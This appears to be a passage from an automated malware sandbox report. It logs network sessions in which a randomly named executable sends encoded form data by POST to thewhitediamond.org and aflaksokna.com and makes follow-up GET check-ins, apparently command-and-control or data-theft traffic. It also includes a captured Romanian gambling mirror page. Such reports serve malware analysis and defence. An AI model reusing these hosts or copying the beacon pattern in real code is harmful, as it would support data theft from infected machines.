              Data Ascii: -30.7c-14.8,0-20.2-11-17.3-25.5L532.2,188c2.5-15.2,9.2-24.4,28-24.4h23.3c19.8,0,24.7,9.6,20.5,30L579,328z" class="SvgLogo_st4_WmLRg"></path> <path d="M241.2,163.6c7.8,9.2,17,20.5,12.3,48.1l-12,64.8l2.1,52c0.4,18.
              Sep 6, 2024 09:07:25.218210936 CEST1236INData Raw: 2e 70 68 70 22 3e 53 70 6f 72 74 75 72 69 20 64 65 20 46 61 6e 74 65 7a 69 65 3c 2f 61 3e 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 68 69 64 65 5f 32 22
              Data Ascii: .php">Sporturi de Fantezie</a></li> <li class="hide_2"><a href="./tvbet.php">TVBET</a></li> <li class="hide_3"><a href="./aviator.php">Aviator</a></li> <li cla
              Sep 6, 2024 09:07:25.218221903 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 c3 8e 6e 72 65 67 69 73 74 72 61 72 65 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20
              Data Ascii: nregistrare </a> </div> </div> </header> <div class="wrap"> <div class="box text b10"> <h1 class="center">Despre
              Sep 6, 2024 09:07:25.218234062 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 78 20 6a 63 63 20 62 33 30 22 3e 3c 61 20 68 72 65 66 3d 22 2e 2f 67 6f 2e 70 68 70 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 66 6f 6e 2d 6f 72 61 6e 67 20 73 68 61 64 6f 77
              Data Ascii: <div class="flx jcc b30"><a href="./go.php" class="btn fon-orang shadow-dark h60 radius16">Accesai 1win</a></div> <div class="info-box info-box-warning"> <div class="info-box-content">
              Sep 6, 2024 09:07:25.218358994 CEST1236INData Raw: 20 70 6f 74 20 6d c3 a2 6e 64 72 69 20 63 75 20 75 6e 20 61 73 74 66 65 6c 20 64 65 20 64 6f 63 75 6d 65 6e 74 2c 20 63 6f 6e 66 69 72 6d c3 a2 6e 64 20 66 69 61 62 69 6c 69 74 61 74 65 61 20 c8 99 69 20 74 72 61 6e 73 70 61 72 65 6e c8 9b 61 20
              Data Ascii: pot mndri cu un astfel de document, confirmnd fiabilitatea i transparena serviciilor lor, oferind acces la:</p> <ul> <li>maini de sloturi i aparate de jocuri pe orice tem</li>
              Sep 6, 2024 09:07:25.218372107 CEST1236INData Raw: 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 66 6f 2d 62 6f 78 20 69 6e 66 6f 2d 62 6f 78 2d 73 75 63 63 65 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e
              Data Ascii: <div class="info-box info-box-success"> <div class="info-box-content"> <p>n unele jocuri, putei juca n modul demo complet gratuit, fr autorizare, crearea profilului i rencrca
              Sep 6, 2024 09:07:25.218384027 CEST1236INData Raw: 61 6c c4 83 20 31 57 49 4e 2e 20 41 63 65 73 74 20 6c 75 63 72 75 20 65 73 74 65 20 64 65 6f 73 65 62 69 74 20 64 65 20 72 65 6c 65 76 61 6e 74 20 c3 ae 6e 20 63 61 7a 75 72 69 6c 65 20 c3 ae 6e 20 63 61 72 65 20 73 69 74 65 2d 75 6c 20 6f 66 69
              Data Ascii: al 1WIN. Acest lucru este deosebit de relevant n cazurile n care site-ul oficial se confrunt cu blocaje din partea motoarelor de cutare, autoritilor de aplicare a legii sau probleme tehnice. Chiar i platformele de divertisment
              Sep 6, 2024 09:07:25.223184109 CEST1236INData Raw: 73 c4 83 20 75 69 74 61 c8 9b 69 20 64 65 20 6a 6f 63 75 72 69 20 70 65 6e 74 72 75 20 6f 20 70 65 72 69 6f 61 64 c4 83 20 64 65 20 74 69 6d 70 20 73 61 75 20 73 c4 83 20 76 c4 83 20 6c 75 61 c8 9b 69 20 72 c4 83 6d 61 73 20 62 75 6e 20 64 65 20
              Data Ascii: s uitai de jocuri pentru o perioad de timp sau s v luai rmas bun de la progresul sau banii dvs. Mirror-ul funcional al 1win de astzi v va ajuta.</p> </div> </div>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              37192.168.2.6497663.33.130.190805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:07:30.361263990 CEST812OUTPOST /j05r/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.thewhitediamond.org
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.thewhitediamond.org
              Referer: http://www.thewhitediamond.org/j05r/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 4d 73 2b 46 64 61 71 4e 57 36 6e 58 65 35 4a 6b 4e 6a 51 74 4a 42 45 2f 7a 68 6a 33 6d 31 64 34 46 4d 47 42 43 41 67 51 50 69 61 74 6e 4b 61 39 4d 46 72 6f 32 73 79 68 6a 77 4e 72 78 62 36 39 39 7a 37 7a 50 68 6a 6e 78 6c 4d 6e 33 70 2b 5a 55 38 63 32 52 79 64 55 72 4d 37 39 2b 57 56 30 2b 74 65 6e 51 48 68 6f 68 52 31 65 74 6d 54 6f 43 43 59 31 4a 71 4c 64 4a 53 32 55 66 62 4d 30 70 36 55 6c 53 62 71 78 5a 4f 7a 61 79 59 55 47 41 64 70 6b 2b 47 38 56 57 76 4c 56 39 47 4e 52 37 75 72 75 42 4a 51 33 69 4f 6e 4c 31 75 59 52 2f 72 31 71 71 36 4e 51 70 74 6b 53 79 52 51 71 2b 69 7a 2b 43 48 48 6b 77 4f 69 4e
              Data Ascii: FR=Ms+FdaqNW6nXe5JkNjQtJBE/zhj3m1d4FMGBCAgQPiatnKa9MFro2syhjwNrxb699z7zPhjnxlMn3p+ZU8c2RydUrM79+WV0+tenQHhohR1etmToCCY1JqLdJS2UfbM0p6UlSbqxZOzayYUGAdpk+G8VWvLV9GNR7uruBJQ3iOnL1uYR/r1qq6NQptkSyRQq+iz+CHHkwOiN


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              38192.168.2.6497673.33.130.190805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:07:32.903429031 CEST836OUTPOST /j05r/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.thewhitediamond.org
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.thewhitediamond.org
              Referer: http://www.thewhitediamond.org/j05r/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 4d 73 2b 46 64 61 71 4e 57 36 6e 58 65 5a 5a 6b 4f 45 73 74 5a 52 45 2b 34 42 6a 33 38 46 63 78 46 4d 4b 42 43 46 52 4c 50 51 2b 74 6e 6f 53 39 4e 42 33 6f 31 73 79 68 37 67 4e 71 38 37 37 51 39 79 48 64 50 6a 6e 6e 78 6c 49 6e 33 72 32 5a 55 72 49 31 52 69 64 73 69 73 37 6a 78 32 56 30 2b 74 65 6e 51 44 4a 43 68 52 39 65 74 54 62 6f 43 68 41 32 57 61 4c 65 49 53 32 55 4f 72 4d 77 70 36 56 32 53 61 33 6d 5a 4b 44 61 79 64 6f 47 41 4d 70 6e 77 32 39 65 5a 50 4b 35 32 56 51 38 33 74 43 59 4b 70 42 51 38 64 66 4b 39 34 5a 4c 6a 59 31 4a 34 71 74 53 70 76 38 67 79 78 51 41 38 69 4c 2b 51 51 4c 44 2f 36 48 75 2f 4b 63 78 52 2b 63 6a 42 35 70 64 71 76 46 6e 69 6e 61 57 46 41 3d 3d
              Data Ascii: FR=Ms+FdaqNW6nXeZZkOEstZRE+4Bj38FcxFMKBCFRLPQ+tnoS9NB3o1syh7gNq877Q9yHdPjnnxlIn3r2ZUrI1Ridsis7jx2V0+tenQDJChR9etTboChA2WaLeIS2UOrMwp6V2Sa3mZKDaydoGAMpnw29eZPK52VQ83tCYKpBQ8dfK94ZLjY1J4qtSpv8gyxQA8iL+QQLD/6Hu/KcxR+cjB5pdqvFninaWFA==


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              39192.168.2.6497683.33.130.190805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:07:35.448297977 CEST1849OUTPOST /j05r/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.thewhitediamond.org
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.thewhitediamond.org
              Referer: http://www.thewhitediamond.org/j05r/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 4d 73 2b 46 64 61 71 4e 57 36 6e 58 65 5a 5a 6b 4f 45 73 74 5a 52 45 2b 34 42 6a 33 38 46 63 78 46 4d 4b 42 43 46 52 4c 50 51 32 74 6b 64 65 39 4c 67 33 6f 30 73 79 68 6c 77 4e 76 38 37 36 53 39 7a 76 5a 50 6a 36 53 78 6d 67 6e 78 49 75 5a 46 4b 49 31 66 69 64 73 76 4d 37 2b 2b 57 56 68 2b 70 36 72 51 48 74 43 68 52 39 65 74 55 72 6f 4c 53 59 32 46 4b 4c 64 4a 53 32 51 66 62 4d 49 70 36 4e 6d 53 61 69 62 5a 62 2f 61 79 35 30 47 54 4b 46 6e 79 57 39 63 65 50 4b 68 32 56 63 2f 33 73 75 6c 4b 70 30 31 38 65 44 4b 72 65 45 6d 31 63 41 66 74 71 6c 58 33 2b 59 71 31 78 4d 31 7a 30 33 66 66 51 53 7a 2b 35 6a 45 6d 4d 51 72 61 66 70 53 49 36 64 52 74 62 38 31 69 6e 72 39 65 62 51 30 45 56 50 74 55 4d 6c 74 52 59 54 32 50 64 7a 74 59 6b 74 34 6c 6b 56 79 6a 79 64 37 77 47 41 54 46 56 47 4a 34 45 48 72 2f 79 4e 42 55 59 35 6d 4e 2f 76 4f 69 30 76 70 67 72 53 52 66 4b 39 72 43 6c 65 55 78 4d 77 64 41 66 43 31 4e 51 33 2b 34 76 30 75 71 77 4e 2f 31 62 57 4c 6a 53 67 49 53 50 6c 37 66 7a 78 71 4b 41 73 [TRUNCATED]
              Data Ascii: FR=Ms+FdaqNW6nXeZZkOEstZRE+4Bj38FcxFMKBCFRLPQ2tkde9Lg3o0syhlwNv876S9zvZPj6SxmgnxIuZFKI1fidsvM7++WVh+p6rQHtChR9etUroLSY2FKLdJS2QfbMIp6NmSaibZb/ay50GTKFnyW9cePKh2Vc/3sulKp018eDKreEm1cAftqlX3+Yq1xM1z03ffQSz+5jEmMQrafpSI6dRtb81inr9ebQ0EVPtUMltRYT2PdztYkt4lkVyjyd7wGATFVGJ4EHr/yNBUY5mN/vOi0vpgrSRfK9rCleUxMwdAfC1NQ3+4v0uqwN/1bWLjSgISPl7fzxqKAsvIXgcxoUcDyp166CqATfD1PcybGojuVdCk01n0OZ+MruEdpJezhIJzXoJWk1TecNnc04giqpf419zqdZkSSprFN+SkqQMhBe2LlvBfXkFjTPklT2mRbIZmdxhPtIG9CPz9GboMmUlqVWrZB56FITBd6I0+ob5ejdy/wx0QGeaRd/k1hyA+vbi2F3o5zkOv1Vr2CEp3R/ZquI2uQ5S9KBnWjLPFHP30GqaUXW7WW/lZjHD65gjXWpc9gmTDEaV3j5RFgZ2eNr0RRwFfYEVIqSIO7P9nUt9fIPZABrovyqkBLHSZzbQ/lJIBoXkARRB+F9scylPjTBsjpMhX7ob1RSX+JoYvBe9y17m5NkiT11nWHiL4iZmlMzbmEzpHIJhvpVbwah1RnISyWE3tQBjmqg8+DvL28WoiSv9YZg8ZMyj0BlOueyWmgztVTpj6FLy1kNMPuYTl7VW+QNyGuZSQUFQNeJZC/tH8O82B+a/ZTs4kBAr+S7pOOVRL7yYH77yjKEpbUdeFP2K1IS9Yg5ncGxSMw7wRcwbC9hnYSIOpxLm1fpphE3kwqTK3vh1LtxQXXNa/XsXuIDOaZcRBnaMbX4yAjks5rlLH6B8u6L58iTgKH80RZc2NBDWgUpXk55tvq2ZiZ5u7KkY4GMxUJtmOMv57h7fXcNhuKqbp [TRUNCATED]


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              40192.168.2.6497693.33.130.190805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:07:37.989592075 CEST537OUTGET /j05r/?FR=BuWlesfdBtPnA5IHERdoQmZu3QbBl1BpYdqEJlZZDkGznKOwHVqz9ciJpAUT/J3S93ftOAqXjjElrJOBApQXUwRpks3avQJqxp6cbB0vhTJHmzWOGAIsV62ofQDOeP44q5hyDP4=&yXghy=KTox HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.thewhitediamond.org
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:07:39.405561924 CEST405INHTTP/1.1 200 OK
              Server: openresty
              Date: Fri, 06 Sep 2024 07:07:39 GMT
              Content-Type: text/html
              Content-Length: 265
              Connection: close
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 52 3d 42 75 57 6c 65 73 66 64 42 74 50 6e 41 35 49 48 45 52 64 6f 51 6d 5a 75 33 51 62 42 6c 31 42 70 59 64 71 45 4a 6c 5a 5a 44 6b 47 7a 6e 4b 4f 77 48 56 71 7a 39 63 69 4a 70 41 55 54 2f 4a 33 53 39 33 66 74 4f 41 71 58 6a 6a 45 6c 72 4a 4f 42 41 70 51 58 55 77 52 70 6b 73 33 61 76 51 4a 71 78 70 36 63 62 42 30 76 68 54 4a 48 6d 7a 57 4f 47 41 49 73 56 36 32 6f 66 51 44 4f 65 50 34 34 71 35 68 79 44 50 34 3d 26 79 58 67 68 79 3d 4b 54 6f 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FR=BuWlesfdBtPnA5IHERdoQmZu3QbBl1BpYdqEJlZZDkGznKOwHVqz9ciJpAUT/J3S93ftOAqXjjElrJOBApQXUwRpks3avQJqxp6cbB0vhTJHmzWOGAIsV62ofQDOeP44q5hyDP4=&yXghy=KTox"}</script></head></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              41192.168.2.6497705.144.130.52805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:07:44.522728920 CEST797OUTPOST /539x/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.aflaksokna.com
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.aflaksokna.com
              Referer: http://www.aflaksokna.com/539x/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 69 45 6a 64 74 49 73 64 72 62 4a 54 4e 72 4a 77 46 6b 77 34 43 30 39 34 56 6b 44 6f 75 51 58 55 65 6b 70 4c 67 74 39 48 77 6e 78 2b 2f 6b 36 74 47 4f 78 54 6a 47 69 77 62 77 6d 39 77 35 62 4d 5a 72 4f 4d 32 69 63 6a 71 65 52 53 4c 35 4f 32 6d 46 35 61 52 32 62 58 63 66 47 69 31 4f 75 48 36 63 79 57 73 4c 6c 43 65 5a 63 42 47 77 77 39 78 30 31 71 2f 79 42 68 37 7a 72 2b 75 59 6d 4c 32 47 33 66 57 51 77 75 5a 69 37 2f 6e 49 53 75 79 78 65 55 7a 35 44 55 32 6e 42 30 33 69 2b 66 4a 70 2b 2b 33 6b 54 58 58 51 6c 37 67 45 35 49 70 70 4b 39 4f 63 62 5a 74 79 76 51 49 76 4b 66 33 31 54 48 64 4d 53 4d 6e 34 59 37
              Data Ascii: FR=iEjdtIsdrbJTNrJwFkw4C094VkDouQXUekpLgt9Hwnx+/k6tGOxTjGiwbwm9w5bMZrOM2icjqeRSL5O2mF5aR2bXcfGi1OuH6cyWsLlCeZcBGww9x01q/yBh7zr+uYmL2G3fWQwuZi7/nISuyxeUz5DU2nB03i+fJp++3kTXXQl7gE5IppK9OcbZtyvQIvKf31THdMSMn4Y7


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              42192.168.2.6497715.144.130.52805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:07:47.075408936 CEST821OUTPOST /539x/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.aflaksokna.com
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.aflaksokna.com
              Referer: http://www.aflaksokna.com/539x/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 69 45 6a 64 74 49 73 64 72 62 4a 54 43 76 4e 77 41 44 73 34 45 55 39 2f 5a 45 44 6f 6e 77 58 59 65 6b 6c 4c 67 76 52 58 6c 45 46 2b 2f 42 65 74 46 50 78 54 76 6d 69 77 56 51 6e 31 2f 5a 62 4c 5a 72 79 69 32 6a 67 6a 71 65 74 53 4c 35 2b 32 6e 79 55 4d 51 6d 62 76 46 50 47 61 78 4f 75 48 36 63 79 57 73 4c 67 66 65 5a 45 42 47 41 73 39 77 52 4a 72 32 53 42 69 38 7a 72 2b 2f 49 6d 78 32 47 32 4b 57 55 52 44 5a 68 44 2f 6e 4b 61 75 31 6a 32 56 39 35 44 65 72 58 42 67 36 41 43 52 42 6f 75 7a 2f 57 50 61 4f 79 4a 44 6c 79 34 53 31 61 4b 65 63 4d 37 62 74 77 33 69 49 50 4b 31 31 31 72 48 50 62 65 72 6f 4d 39 59 75 57 6b 6e 41 35 71 79 73 4b 6d 32 38 50 34 56 38 78 76 56 6c 51 3d 3d
              Data Ascii: FR=iEjdtIsdrbJTCvNwADs4EU9/ZEDonwXYeklLgvRXlEF+/BetFPxTvmiwVQn1/ZbLZryi2jgjqetSL5+2nyUMQmbvFPGaxOuH6cyWsLgfeZEBGAs9wRJr2SBi8zr+/Imx2G2KWURDZhD/nKau1j2V95DerXBg6ACRBouz/WPaOyJDly4S1aKecM7btw3iIPK111rHPberoM9YuWknA5qysKm28P4V8xvVlQ==


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              43192.168.2.6497725.144.130.52805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:07:49.625061035 CEST1834OUTPOST /539x/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.aflaksokna.com
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.aflaksokna.com
              Referer: http://www.aflaksokna.com/539x/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 69 45 6a 64 74 49 73 64 72 62 4a 54 43 76 4e 77 41 44 73 34 45 55 39 2f 5a 45 44 6f 6e 77 58 59 65 6b 6c 4c 67 76 52 58 6c 46 39 2b 2f 79 6d 74 48 73 5a 54 68 47 69 77 64 77 6e 32 2f 5a 61 4f 5a 72 71 75 32 6a 73 56 71 62 68 53 4a 61 47 32 67 44 55 4d 65 6d 62 76 59 66 47 68 31 4f 75 6f 36 63 69 6f 73 4c 77 66 65 5a 45 42 47 43 59 39 67 30 31 72 77 53 42 68 37 7a 72 49 75 59 6e 2f 32 47 2f 78 57 55 55 2b 5a 78 6a 2f 67 70 79 75 77 57 43 56 78 35 44 59 6f 58 41 6e 36 41 50 54 42 6f 7a 4b 2f 58 36 78 4f 78 56 44 6d 33 56 76 6c 4a 53 2f 41 74 72 70 31 48 62 6f 47 66 47 64 73 6d 72 6f 44 5a 61 34 67 4f 4a 30 6d 42 4d 45 55 35 2f 64 73 59 4c 64 31 4b 70 56 38 68 75 75 77 44 69 45 6c 4f 79 47 6f 7a 6d 63 64 59 50 55 6a 7a 64 39 51 6f 6c 67 41 72 43 56 32 30 50 31 67 61 61 78 4d 77 6d 66 6e 46 2b 7a 69 4b 45 55 5a 42 56 4f 57 71 57 52 57 57 6a 68 2f 74 48 47 4e 66 33 34 4f 66 6f 30 6c 62 51 63 45 58 46 6c 51 4e 5a 4d 77 67 62 74 51 71 47 69 61 77 79 56 30 44 66 38 6c 65 31 6a 59 2f 44 4f 36 71 42 [TRUNCATED]
              Data Ascii: FR=iEjdtIsdrbJTCvNwADs4EU9/ZEDonwXYeklLgvRXlF9+/ymtHsZThGiwdwn2/ZaOZrqu2jsVqbhSJaG2gDUMembvYfGh1Ouo6ciosLwfeZEBGCY9g01rwSBh7zrIuYn/2G/xWUU+Zxj/gpyuwWCVx5DYoXAn6APTBozK/X6xOxVDm3VvlJS/Atrp1HboGfGdsmroDZa4gOJ0mBMEU5/dsYLd1KpV8huuwDiElOyGozmcdYPUjzd9QolgArCV20P1gaaxMwmfnF+ziKEUZBVOWqWRWWjh/tHGNf34Ofo0lbQcEXFlQNZMwgbtQqGiawyV0Df8le1jY/DO6qBT+RHQ3wS+blsgNv9QbQvvlFxj21PSdy6fx4qKkKp2xAEthdBtVsAJ9eKWViSRet9ExomuTVXeFaOeFl53Yuxa1yQO+3ig03QeYnvgmgNC+e2vqrQmtPMoDYPEXehmtHkG+tkMi4yzKrMAnhqbWRcxgoIWqyq1/pA0deAzDUn3MKL5gTVyBMz50vcEXvSBRZ7kH9HuZZ+3lCdNHzHxBHkShlEt0+NAWJGlYiVV8iA2Y6usumLNYXXfz7LrOvyh77mvJAuVFUIPWKpjcMx2ZVVRsLPDaujDB5KyZPDrLv3RvwOroSpB/X+t1BWrG+M1OcA8mLmPMGkmDl9xwghDqSVO+XDzi3GeFHE4kXTwibS8n6255SwT7/Qy4Xf95XGZ3zJqsfzDz8fuO63pg6r7+2mCwIadLm5ti/piGg1bwm/3krBiGa4MXe9En3tr0D+9sY8pNaUkE8YWUfWQ2ZbTiTx3YysPaSEKAfVoMGcLVG9Sym7AwIzZwp9v3Mm4UV36v1lBH4oH8QfyYuqFx9sb4dYY8Sb6ZQBsZ593wDsJiWAg19dpDQ4AFxTTqjMAzR4UTpwt1Q+HECIS/jmbwGidRGwp3tAKYO27sVHVChtx5Vb0Ass4rbIfg4ciHAErKqPlsYiqQ4oAg8iKdZ7KW28M0KpnTCj1lpQ0rEx0b [TRUNCATED]


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              44192.168.2.6497735.144.130.52805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:07:52.159965992 CEST532OUTGET /539x/?FR=vGL9u4UoqpVZZPxrAmsiFiNaZFXain6KGFUZntJW9QYk7D2LL7MCvEOQVB7xyJGTP+28tzk4zfIPRYPtsAwCb1rqdvGtj+iK/r6v/IcJfZgSJV4K5VQUlSITkxaZv9eo0HTeJgk=&yXghy=KTox HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.aflaksokna.com
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:08:01.970495939 CEST1172INHTTP/1.1 302 Found
              Connection: close
              content-type: text/html
              content-length: 771
              date: Fri, 06 Sep 2024 07:08:01 GMT
              cache-control: no-cache, no-store, must-revalidate, max-age=0
              location: http://www.aflaksokna.com/cgi-sys/suspendedpage.cgi?FR=vGL9u4UoqpVZZPxrAmsiFiNaZFXain6KGFUZntJW9QYk7D2LL7MCvEOQVB7xyJGTP+28tzk4zfIPRYPtsAwCb1rqdvGtj+iK/r6v/IcJfZgSJV4K5VQUlSITkxaZv9eo0HTeJgk=&yXghy=KTox
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
